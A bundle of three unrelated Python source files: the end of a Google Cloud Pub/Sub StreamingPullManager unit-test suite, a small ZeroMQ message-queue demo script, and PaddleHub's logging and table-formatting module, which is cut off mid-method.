streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
msg.nack.assert_called_once()
on_callback_error.assert_called_once_with(callback_error)
def test_constructor_and_default_state():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client, mock.sentinel.subscription
)
# Public state
assert manager.is_active is False
assert manager.flow_control == types.FlowControl()
assert manager.dispatcher is None
assert manager.leaser is None
assert manager.ack_histogram is not None
assert manager.ack_deadline == 10
assert manager.load == 0
# Private state
assert manager._client == mock.sentinel.client
assert manager._subscription == mock.sentinel.subscription
assert manager._scheduler is not None
assert manager._messages_on_hold is not None
def test_constructor_with_options():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client,
mock.sentinel.subscription,
flow_control=mock.sentinel.flow_control,
scheduler=mock.sentinel.scheduler,
)
assert manager.flow_control == mock.sentinel.flow_control
assert manager._scheduler == mock.sentinel.scheduler
def make_manager(**kwargs):
client_ = mock.create_autospec(client.Client, instance=True)
scheduler_ = mock.create_autospec(scheduler.Scheduler, instance=True)
return streaming_pull_manager.StreamingPullManager(
client_, "subscription-name", scheduler=scheduler_, **kwargs
)
def fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10):
"""Add a simplified fake add() method to a leaser instance.
The fake add() method actually increases the leaser's internal message count
by one for each message, and the total bytes by ``assumed_msg_size`` for
each message (regardless of the actual message size).
"""
def fake_add(self, items):
self.message_count += len(items)
self.bytes += len(items) * assumed_msg_size
leaser.message_count = init_msg_count
leaser.bytes = init_msg_count * assumed_msg_size
leaser.add = stdlib_types.MethodType(fake_add, leaser)
def test_ack_deadline():
manager = make_manager()
assert manager.ack_deadline == 10
manager.ack_histogram.add(20)
assert manager.ack_deadline == 20
manager.ack_histogram.add(10)
assert manager.ack_deadline == 20
def test_maybe_pause_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_pause_consumer() # no raise
# Ensure load > 1
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 100
_leaser.bytes = 10000
manager.maybe_pause_consumer() # no raise
def test_lease_load_and_pause():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# This should mean that our messages count is at 10%, and our bytes
# are at 15%; load should return the higher (0.15), and shouldn't cause
# the consumer to pause.
manager.leaser.add(
[requests.LeaseRequest(ack_id="one", byte_size=150, ordering_key="")]
)
assert manager.load == 0.15
manager.maybe_pause_consumer()
manager._consumer.pause.assert_not_called()
# After this message is added, the messages should be higher at 20%
# (versus 16% for bytes).
manager.leaser.add(
[requests.LeaseRequest(ack_id="two", byte_size=10, ordering_key="")]
)
assert manager.load == 0.2
# Returning a number above 100% is fine, and it should cause this to pause.
manager.leaser.add(
[requests.LeaseRequest(ack_id="three", byte_size=1000, ordering_key="")]
)
assert manager.load == 1.16
manager.maybe_pause_consumer()
manager._consumer.pause.assert_called_once()
def test_drop_and_resume():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = True
# Add several messages until we're over the load threshold.
manager.leaser.add(
[
requests.LeaseRequest(ack_id="one", byte_size=750, ordering_key=""),
requests.LeaseRequest(ack_id="two", byte_size=250, ordering_key=""),
]
)
assert manager.load == 1.0
# Trying to resume now should have no effect as we're over the threshold.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
# Drop the 200 byte message, which should put us under the resume
# threshold.
manager.leaser.remove(
[requests.DropRequest(ack_id="two", byte_size=250, ordering_key="")]
)
manager.maybe_resume_consumer()
manager._consumer.resume.assert_called_once()
def test_resume_not_paused():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# Resuming should have no effect is the consumer is not actually paused.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
def test_maybe_resume_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_resume_consumer() # no raise
def test__maybe_release_messages_on_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=11)
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = msg.size
# Ensure load is exactly 1.0 (to verify that >= condition is used)
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 10
_leaser.bytes = 1000 + msg.size
manager._maybe_release_messages()
assert manager._messages_on_hold.size == 1
manager._leaser.add.assert_not_called()
manager._scheduler.schedule.assert_not_called()
def test__maybe_release_messages_below_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._callback = mock.sentinel.callback
# Init leaser message count to 11, so that when subtracting the 3 messages
# that are on hold, there is still room for another 2 messages before the
# max load is hit.
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
fake_leaser_add(_leaser, init_msg_count=11, assumed_msg_size=10)
messages = [
mock.create_autospec(message.Message, instance=True, ack_id="ack_foo", size=10),
mock.create_autospec(message.Message, instance=True, ack_id="ack_bar", size=10),
mock.create_autospec(message.Message, instance=True, ack_id="ack_baz", size=10),
]
for msg in messages:
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = 3 * 10
# the actual call of MUT
manager._maybe_release_messages()
assert manager._messages_on_hold.size == 1
msg = manager._messages_on_hold.get()
assert msg.ack_id == "ack_baz"
schedule_calls = manager._scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for _, call_args, _ in schedule_calls:
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].ack_id in ("ack_foo", "ack_bar")
def test__maybe_release_messages_negative_on_hold_bytes_warning(caplog):
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=17)
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = 5 # too low for some reason
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 3
_leaser.bytes = 150
with caplog.at_level(logging.WARNING):
manager._maybe_release_messages()
expected_warnings = [
record.message.lower()
for record in caplog.records
if "unexpectedly negative" in record.message
]
assert len(expected_warnings) == 1
assert "on hold bytes" in expected_warnings[0]
assert "-12" in expected_warnings[0]
assert manager._on_hold_bytes == 0 # should be auto-corrected
def test_send_unary():
manager = make_manager()
manager._UNARY_REQUESTS = True
manager.send(
types.StreamingPullRequest(
ack_ids=["ack_id1", "ack_id2"],
modify_deadline_ack_ids=["ack_id3", "ack_id4", "ack_id5"],
modify_deadline_seconds=[10, 20, 20],
)
)
manager._client.acknowledge.assert_called_once_with(
subscription=manager._subscription, ack_ids=["ack_id1", "ack_id2"]
)
manager._client.modify_ack_deadline.assert_has_calls(
[
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id3"],
ack_deadline_seconds=10,
),
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id4", "ack_id5"],
ack_deadline_seconds=20,
),
],
any_order=True,
)
def test_send_unary_empty():
manager = make_manager()
manager._UNARY_REQUESTS = True
manager.send(types.StreamingPullRequest())
manager._client.acknowledge.assert_not_called()
manager._client.modify_ack_deadline.assert_not_called()
def test_send_unary_api_call_error(caplog):
caplog.set_level(logging.DEBUG)
manager = make_manager()
manager._UNARY_REQUESTS = True
error = exceptions.GoogleAPICallError("The front fell off")
manager._client.acknowledge.side_effect = error
manager.send(types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "The front fell off" in caplog.text
def test_send_unary_retry_error(caplog):
caplog.set_level(logging.DEBUG)
manager, _, _, _, _, _ = make_running_manager()
manager._UNARY_REQUESTS = True
error = exceptions.RetryError(
"Too long a transient error", cause=Exception("Out of time!")
)
manager._client.acknowledge.side_effect = error
with pytest.raises(exceptions.RetryError):
manager.send(types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "RetryError while sending unary RPC" in caplog.text
assert "signaled streaming pull manager shutdown" in caplog.text
def test_send_streaming():
manager = make_manager()
manager._UNARY_REQUESTS = False
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager.send(mock.sentinel.request)
manager._rpc.send.assert_called_once_with(mock.sentinel.request)
def test_heartbeat():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = True
manager.heartbeat()
manager._rpc.send.assert_called_once_with(types.StreamingPullRequest())
def test_heartbeat_inactive():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = False
manager.heartbeat()
manager._rpc.send.assert_not_called()
@mock.patch("google.api_core.bidi.ResumableBidiRpc", autospec=True)
@mock.patch("google.api_core.bidi.BackgroundConsumer", autospec=True)
@mock.patch("google.cloud.pubsub_v1.subscriber._protocol.leaser.Leaser", autospec=True)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.dispatcher.Dispatcher", autospec=True
)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.heartbeater.Heartbeater", autospec=True
)
def test_open(heartbeater, dispatcher, leaser, background_consumer, resumable_bidi_rpc):
manager = make_manager()
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
heartbeater.assert_called_once_with(manager)
heartbeater.return_value.start.assert_called_once()
assert manager._heartbeater == heartbeater.return_value
dispatcher.assert_called_once_with(manager, manager._scheduler.queue)
dispatcher.return_value.start.assert_called_once()
assert manager._dispatcher == dispatcher.return_value
leaser.assert_called_once_with(manager)
leaser.return_value.start.assert_called_once()
assert manager.leaser == leaser.return_value
background_consumer.assert_called_once_with(manager._rpc, manager._on_response)
background_consumer.return_value.start.assert_called_once()
assert manager._consumer == background_consumer.return_value
resumable_bidi_rpc.assert_called_once_with(
start_rpc=manager._client.api.streaming_pull,
initial_request=mock.ANY,
should_recover=manager._should_recover,
should_terminate=manager._should_terminate,
throttle_reopen=True,
)
initial_request_arg = resumable_bidi_rpc.call_args.kwargs["initial_request"]
assert initial_request_arg.func == manager._get_initial_request
assert initial_request_arg.args[0] == 10 # the default stream ACK timeout
assert not manager._client.api.get_subscription.called
resumable_bidi_rpc.return_value.add_done_callback.assert_called_once_with(
manager._on_rpc_done
)
assert manager._rpc == resumable_bidi_rpc.return_value
manager._consumer.is_active = True
assert manager.is_active is True
def test_open_already_active():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
with pytest.raises(ValueError, match="already open"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def test_open_has_been_closed():
manager = make_manager()
manager._closed = True
with pytest.raises(ValueError, match="closed"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def make_running_manager():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
manager._dispatcher = mock.create_autospec(dispatcher.Dispatcher, instance=True)
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._heartbeater = mock.create_autospec(heartbeater.Heartbeater, instance=True)
return (
manager,
manager._consumer,
manager._dispatcher,
manager._leaser,
manager._heartbeater,
manager._scheduler,
)
def test_close():
manager, consumer, dispatcher, leaser, heartbeater, scheduler = (
make_running_manager()
)
manager.close()
consumer.stop.assert_called_once()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
assert manager.is_active is False
def test_close_inactive_consumer():
manager, consumer, dispatcher, leaser, heartbeater, scheduler = (
make_running_manager()
)
consumer.is_active = False
manager.close()
consumer.stop.assert_not_called()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
def test_close_idempotent():
manager, _, _, _, _, scheduler = make_running_manager()
manager.close()
manager.close()
assert scheduler.shutdown.call_count == 1
class FakeDispatcher(object):
def __init__(self, manager, error_callback):
self._manager = manager
self._error_callback = error_callback
self._thread = None
self._stop = False
def start(self):
self._thread = threading.Thread(target=self._do_work)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._stop = True
self._thread.join()
self._thread = None
def _do_work(self):
while not self._stop:
try:
self._manager.leaser.add([mock.Mock()])
except Exception as exc:
self._error_callback(exc)
time.sleep(0.1)
# also try to interact with the leaser after the stop flag has been set
try:
self._manager.leaser.remove([mock.Mock()])
except Exception as exc:
self._error_callback(exc)
def test_close_no_dispatcher_error():
manager, _, _, _, _, _ = make_running_manager()
error_callback = mock.Mock(name="error_callback")
dispatcher = FakeDispatcher(manager=manager, error_callback=error_callback)
manager._dispatcher = dispatcher
dispatcher.start()
manager.close()
error_callback.assert_not_called()
def test_close_callbacks():
manager, _, _, _, _, _ = make_running_manager()
callback = mock.Mock()
manager.add_close_callback(callback)
manager.close(reason="meep")
callback.assert_called_once_with(manager, "meep")
def test__get_initial_request():
manager = make_manager()
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._leaser.ack_ids = ["1", "2"]
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == ["1", "2"]
assert initial_request.modify_deadline_seconds == [10, 10]
def test__get_initial_request_wo_leaser():
manager = make_manager()
manager._leaser = None
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == []
assert initial_request.modify_deadline_seconds == []
def test__on_response_delivery_attempt():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back",
message=types.PubsubMessage(data=b"bar", message_id="2"),
delivery_attempt=6,
),
]
)
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
manager._on_response(response)
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
msg1 = schedule_calls[0][1][1]
assert msg1.delivery_attempt is None
msg2 = schedule_calls[1][1][1]
assert msg2.delivery_attempt == 6
def test__on_response_no_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back", message=types.PubsubMessage(data=b"bar", message_id="2")
),
]
)
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
dispatcher.modify_ack_deadline.assert_called_once_with(
[requests.ModAckRequest("fack", 10), requests.ModAckRequest("back", 10)]
)
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for call in schedule_calls:
assert call[1][0] == mock.sentinel.callback
assert isinstance(call[1][1], message.Message)
# the leaser load limit not hit, no messages had to be put on hold
assert manager._messages_on_hold.size == 0
def test__on_response_with_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back", message=types.PubsubMessage(data=b"bar", message_id="2")
),
types.ReceivedMessage(
ack_id="zack", message=types.PubsubMessage(data=b"baz", message_id="3")
),
]
)
# Adjust message bookkeeping in leaser. Pick 999 messages, which is just below
# the default FlowControl.max_messages limit.
fake_leaser_add(leaser, init_msg_count=999, assumed_msg_size=10)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
# all messages should be added to the lease management and have their ACK
# deadline extended, even those not dispatched to callbacks
dispatcher.modify_ack_deadline.assert_called_once_with(
[
requests.ModAckRequest("fack", 10),
requests.ModAckRequest("back", 10),
requests.ModAckRequest("zack", 10),
]
)
# one message should be scheduled, the flow control limits allow for it
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 1
call_args = schedule_calls[0][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "1"
# the rest of the messages should have been put on hold
assert manager._messages_on_hold.size == 2
while True:
msg = manager._messages_on_hold.get()
if msg is None:
break
else:
assert isinstance(msg, message.Message)
assert msg.message_id in ("2", "3")
def test__on_response_none_data(caplog):
caplog.set_level(logging.DEBUG)
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10)
manager._on_response(response=None)
scheduler.schedule.assert_not_called()
assert "callback invoked with None" in caplog.text
def test__on_response_with_ordering_keys():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack",
message=types.PubsubMessage(
data=b"foo", message_id="1", ordering_key=""
),
),
types.ReceivedMessage(
ack_id="back",
message=types.PubsubMessage(
data=b"bar", message_id="2", ordering_key="key1"
),
),
types.ReceivedMessage(
ack_id="zack",
message=types.PubsubMessage(
data=b"baz", message_id="3", ordering_key="key1"
),
),
]
)
# Make leaser with zero initial messages, so we don't test lease management
# behavior.
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10)
# Actually run the method and prove that modack and schedule are called in
# the expected way.
manager._on_response(response)
# All messages should be added to the lease management and have their ACK
# deadline extended, even those not dispatched to callbacks.
dispatcher.modify_ack_deadline.assert_called_once_with(
[
requests.ModAckRequest("fack", 10),
requests.ModAckRequest("back", 10),
requests.ModAckRequest("zack", 10),
]
)
# The first two messages should be scheduled, The third should be put on
# hold because it's blocked by the completion of the second, which has the
# same ordering key.
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
call_args = schedule_calls[0][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "1"
call_args = schedule_calls[1][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "2"
# Message 3 should have been put on hold.
assert manager._messages_on_hold.size == 1
# No messages available because message 2 (with "key1") has not completed yet.
assert manager._messages_on_hold.get() is None
# Complete message 2 (with "key1").
manager.activate_ordering_keys(["key1"])
# Completing message 2 should release message 3.
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 3
call_args = schedule_calls[2][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "3"
# No messages available in the queue.
assert manager._messages_on_hold.get() is None
def test_retryable_stream_errors():
# Make sure the config matches our hard-coded tuple of exceptions.
interfaces = subscriber_client_config.config["interfaces"]
retry_codes = interfaces["google.pubsub.v1.Subscriber"]["retry_codes"]
idempotent = retry_codes["idempotent"]
status_codes = tuple(getattr(grpc.StatusCode, name, None) for name in idempotent)
expected = tuple(
exceptions.exception_class_for_grpc_status(status_code)
for status_code in status_codes
)
assert set(expected).issubset(set(streaming_pull_manager._RETRYABLE_STREAM_ERRORS))
def test__should_recover_true():
manager = make_manager()
details = "UNAVAILABLE. Service taking nap."
exc = exceptions.ServiceUnavailable(details)
assert manager._should_recover(exc) is True
def test__should_recover_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_recover(exc) is False
def test__should_terminate_true():
manager = make_manager()
details = "Cancelled. Go away, before I taunt you a second time."
exc = exceptions.Cancelled(details)
assert manager._should_terminate(exc) is True
def test__should_terminate_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_terminate(exc) is False
@mock.patch("threading.Thread", autospec=True)
def test__on_rpc_done(thread):
manager = make_manager()
manager._on_rpc_done(mock.sentinel.error)
thread.assert_called_once_with(
name=mock.ANY, target=manager.close, kwargs={"reason": mock.sentinel.error}
)
def test_activate_ordering_keys():
manager = make_manager()
manager._messages_on_hold = mock.create_autospec(
messages_on_hold.MessagesOnHold, instance=True
)
manager.activate_ordering_keys(["key1", "key2"])
manager._messages_on_hold.activate_ordering_keys.assert_called_once_with(
["key1", "key2"], mock.ANY
)
|
queuecrazy.py
|
#!/usr/bin/env python
# Foundations of Python Network Programming - Chapter 8 - queuecrazy.py
# Small application that uses several different message queues
import random, threading, time, zmq
zcontext = zmq.Context()
def fountain(url):
"""Produces a steady stream of words."""
zsock = zcontext.socket(zmq.PUSH)
zsock.bind(url)
words = [ w for w in dir(__builtins__) if w.islower() ]
while True:
zsock.send(random.choice(words))
time.sleep(0.4)
def responder(url, function):
"""Performs a string operation on each word received."""
zsock = zcontext.socket(zmq.REP)
zsock.bind(url)
while True:
word = zsock.recv()
zsock.send(function(word)) # send the modified word back
def processor(n, fountain_url, responder_urls):
"""Read words as they are produced; get them processed; print them."""
zpullsock = zcontext.socket(zmq.PULL)
zpullsock.connect(fountain_url)
zreqsock = zcontext.socket(zmq.REQ)
for url in responder_urls:
zreqsock.connect(url)
while True:
word = zpullsock.recv()
zreqsock.send(word)
print n, zreqsock.recv()
def start_thread(function, *args):
thread = threading.Thread(target=function, args=args)
thread.daemon = True # so you can easily Control-C the whole program
thread.start()
start_thread(fountain, 'tcp://127.0.0.1:6700')
start_thread(responder, 'tcp://127.0.0.1:6701', str.upper)
start_thread(responder, 'tcp://127.0.0.1:6702', str.lower)
for n in range(3):
start_thread(processor, n + 1, 'tcp://127.0.0.1:6700',
['tcp://127.0.0.1:6701', 'tcp://127.0.0.1:6702'])
time.sleep(30)
|
log.py
|
# coding:utf-8
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import functools
import logging
import os
import sys
import time
import threading
from typing import List
import colorlog
from colorama import Fore
import paddlehub.config as hubconf
from paddlehub.env import LOG_HOME
loggers = {}
log_config = {
'DEBUG': {
'level': 10,
'color': 'purple'
},
'INFO': {
'level': 20,
'color': 'green'
},
'TRAIN': {
'level': 21,
'color': 'cyan'
},
'EVAL': {
'level': 22,
'color': 'blue'
},
'WARNING': {
'level': 30,
'color': 'yellow'
},
'ERROR': {
'level': 40,
'color': 'red'
},
'CRITICAL': {
'level': 50,
'color': 'bold_red'
}
}
class Logger(object):
'''
Deafult logger in PaddleHub
Args:
name(str) : Logger name, default is 'PaddleHub'
'''
def __init__(self, name: str = None):
name = 'PaddleHub' if not name else name
self.logger = logging.getLogger(name)
for key, conf in log_config.items():
logging.addLevelName(conf['level'], key)
self.__dict__[key] = functools.partial(self.__call__, conf['level'])
self.__dict__[key.lower()] = functools.partial(self.__call__, conf['level'])
self.format = colorlog.ColoredFormatter(
'%(log_color)s[%(asctime)-15s] [%(levelname)8s]%(reset)s - %(message)s',
log_colors={key: conf['color']
for key, conf in log_config.items()})
self.handler = logging.StreamHandler()
self.handler.setFormatter(self.format)
self.logger.addHandler(self.handler)
self.logLevel = hubconf.log_level
self.logger.setLevel(logging.DEBUG)
self.logger.propagate = False
self._is_enable = hubconf.log_enable
def disable(self):
self._is_enable = False
def enable(self):
self._is_enable = True
@property
def is_enable(self) -> bool:
return self._is_enable
def __call__(self, log_level: str, msg: str):
if not self.is_enable:
return
self.logger.log(log_level, msg)
@contextlib.contextmanager
def use_terminator(self, terminator: str):
old_terminator = self.handler.terminator
self.handler.terminator = terminator
yield
self.handler.terminator = old_terminator
@contextlib.contextmanager
def processing(self, msg: str, interval: float = 0.1):
'''
Continuously print a progress bar with rotating special effects.
Args:
msg(str): Message to be printed.
interval(float): Rotation interval. Default to 0.1.
'''
end = False
def _printer():
index = 0
flags = ['\\', '|', '/', '-']
while not end:
flag = flags[index % len(flags)]
with self.use_terminator('\r'):
self.info('{}: {}'.format(msg, flag))
time.sleep(interval)
index += 1
t = threading.Thread(target=_printer)
t.start()
yield
end = True
class ProgressBar(object):
'''
Progress bar printer
Args:
title(str) : Title text
flush_interval(float): Flush rate of progress bar, default is 0.1.
Examples:
.. code-block:: python
with ProgressBar('Download module') as bar:
for i in range(100):
bar.update(i / 100)
# with continuous bar.update, the progress bar in the terminal
# will continue to update until 100%
#
# Download module
# [##################################################] 100.00%
'''
def __init__(self, title: str, flush_interval: float = 0.1):
self.last_flush_time = time.time()
self.flush_interval = flush_interval
self._end = False
self.title = title
def __enter__(self):
sys.stdout.write('{}\n'.format(self.title))
return self
def __exit__(self, exit_exception, exit_value, exit_traceback):
if not exit_value:
self._end = True
self.update(1)
else:
sys.stdout.write('\n')
def update(self, progress: float):
'''
Update progress bar
Args:
progress: Processing progress, from 0.0 to 1.0
'''
msg = '[{:<50}] {:.2f}%'.format('#' * int(progress * 50), progress * 100)
need_flush = (time.time() - self.last_flush_time) >= self.flush_interval
if need_flush or self._end:
sys.stdout.write('\r{}'.format(msg))
self.last_flush_time = time.time()
sys.stdout.flush()
if self._end:
sys.stdout.write('\n')
class FormattedText(object):
'''
Cross-platform formatted string
Args:
text(str) : Text content
width(int) : Text length, if the text is less than the specified length, it will be filled with spaces
align(str) : Text alignment, it must be:
======== ====================================
Charater Meaning
-------- ------------------------------------
'<' The text will remain left aligned
'^' The text will remain middle aligned
'>' The text will remain right aligned
======== ====================================
color(str) : Text color, default is None(depends on terminal configuration)
'''
_MAP = {'red': Fore.RED, 'yellow': Fore.YELLOW, 'green': Fore.GREEN, 'blue': Fore.BLUE, 'cyan': Fore.CYAN}
def __init__(self, text: str, width: int = None, align: str = '<', color: str = None):
self.text = text
self.align = align
self.color = FormattedText._MAP[color] if color else color
self.width = width if width else len(self.text)
def __repr__(self) -> str:
form = '{{:{}{}}}'.format(self.align, self.width)
text = form.format(self.text)
if not self.color:
return text
return self.color + text + Fore.RESET
class TableCell(object):
'''The basic components of a table'''
def __init__(self, content: str = '', width: int = 0, align: str = '<', color: str = ''):
self._width = width if width else len(content)
self._width = 1 if self._width < 1 else self._width
self._contents = []
for i in range(0, len(content), self._width):
text = FormattedText(content[i:i + self._width], width, align, color)
self._contents.append(text)
self.align = align
self.color = color
@property
def width(self) -> int:
return self._width
@width.setter
def width(self, value: int):
self._width = value
for content in self._contents:
content.width = value
@property
def height(self) -> int:
return len(self._contents)
@height.setter
def height(self, value: int):
if value < self.height:
raise RuntimeError(self.height, value)
self._contents += [FormattedText('', width=self.width, align=self.align, color=self.color)
] * (value - self.height)
def __len__(self) -> int:
return len(self._contents)
def __getitem__(self, idx: int) -> str:
return self._contents[idx]
def __repr__(self) -> str:
return '\n'.join([str(item) for item in self._contents])
class TableRow(object):
'''Table row composed of TableCell'''
def __init__(self):
self.cells = []
def append(self, cell: TableCell):
self.cells.append(cell)
@property
def width(self) -> int:
_width = 0
for cell in self.cells():
_width += cell.width
return _width
@property
def height(self) -> int:
_height = -1
for cell in self.cells:
_height = max(_height, cell.height)
return _height
def __len__(self) -> int:
return len(self.cells)
def __repr__(self) -> str:
content = ''
for i in range(self.height):
content += '|'
for cell in self.cells:
if i > cell.height:
content = content + '|'
else:
content = content + str(cell[i]) + '|'
content += '\n'
return content
def __getitem__(self, idx: int) -> TableCell:
return self.cells[idx]
class TableColumn(object):
'''Table column composed of TableCell'''
def __init__(self):
self.cells = []
def append(self, cell: TableCell):
self.cells.append(cell)
@property
def width(self) -> int:
_width = -1
for cell in self.cells:
_width = max(_width, cell.width)
return _width
@property
def height(self) -> int:
_height = 0
for cell in self.cells:
_height += cell.height
return _height
def __len__(self) -> int:
return len(self.cells)
def __getitem__(self, idx: int) -> TableCell:
return self.cells[idx]
class Table(object):
'''
Table with adaptive width and height
Args:
colors(list[str]) : Text colors
aligns(list[str]) : Text alignments
widths(list[str]) : Text widths
Examples:
.. code-block:: python
table = Table(widths=[12, 20])
table.append('name', 'PaddleHub')
table.append('version', '2.0.0')
table.append(
'description',
'PaddleHub is a pretrainied model application tool under the PaddlePaddle')
table.append('author')
print(table)
# the result is
# +------------+--------------------+
# |name |PaddleHub |
# +------------+--------------------+
# |version |2.0.0 |
# +------------+--------------------+
# |description |PaddleHub is a pretr|
# | |ainied model applica|
# | |tion tool under the |
# | |PaddlePaddle |
# +------------+--------------------+
# |author | |
# +------------+--------------------+
'''
def __init__(self, colors: List[str] = [], aligns: List[str] = [], widths: List[int] = []):
self.rows = []
self.columns = []
self.colors = colors
self.aligns = aligns
self.widths = widths
def append(self, *contents, colors: List[str] = [], aligns: List[str] = [], widths: List[int] = []):
'''
Add a row to the table
Args:
*contents(*list): Contents of the row, each content will be placed in a separate cell
colors(list[str]) : Text colors
aligns(list[str]) : Text alignments
widths(list[str]) : Text widths
'''
newrow = TableRow()
widths = copy.deepcopy(self.widths) if not widths else widths
colors = copy.deepcopy(self.colors) if not colors else colors
aligns = copy.deepcopy(self.aligns) if not aligns else aligns
